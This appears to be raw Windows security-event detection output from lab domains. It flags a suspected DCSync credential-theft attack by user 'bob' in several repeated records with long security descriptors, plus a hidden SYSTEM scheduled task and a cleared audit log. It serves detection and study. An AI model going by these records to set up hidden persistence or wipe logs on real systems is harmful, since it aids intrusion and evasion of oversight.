O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242598 Security DC1.insecurebank.local 77B63738-C25C-4FBD-BA96-A7ABE17A22A3 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security schedule task updated,1599047269.966623,2020-09-02T15:47:49.966623+04:00,,Audit,Low,schedule task updated by user,4702," 4702 0 0 12804 0 0x8020000000000000 2171293 Security 01566s-win16-ir.threebeesco.com S-1-5-21-308926384-506822093-3341789130-1106 a-jbrown 3B 0x21a8c68 \LMST <?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2020-09-02T04:47:49.74-07:00</Date> <Author>a-jbrown</Author> <Description>00304d6e</Description> <URI>\LMST</URI> </RegistrationInfo> <Triggers> <TimeTrigger> <StartBoundary>2020-02-09T04:47:48</StartBoundary> <EndBoundary>2020-02-09T04:47:58</EndBoundary> <Enabled>true</Enabled> </TimeTrigger> </Triggers> <Principals> <Principal id="Author"> <RunLevel>HighestAvailable</RunLevel> <UserId>SYSTEM</UserId> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <Duration>PT10M</Duration> <WaitTimeout>PT1H</WaitTimeout> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>cmd.exe</Command> <Arguments>/c echo testing &gt; c:\users\public\out.txt</Arguments> </Exec> </Actions> </Task> ",01566s-win16-ir.threebeesco.com,Security Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242597 Security DC1.insecurebank.local 30F197FC-BECA-48D6-923E-A52A437119D3 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242596 Security DC1.insecurebank.local 30F197FC-BECA-48D6-923E-A52A437119D3 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security Audit log cleared,1639331872.272432,2021-12-12T21:57:52.272432+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," 1102 0 4 104 0 0x4020000000000000 2982081 Security 01566s-win16-ir.threebeesco.com S-1-5-21-308926384-506822093-3341789130-1106 a-jbrown 3B 0x364f7 ",01566s-win16-ir.threebeesco.com,Security Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242595 Security DC1.insecurebank.local AF3067E0-BB6F-47C2-AA20-F3F458797F38 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-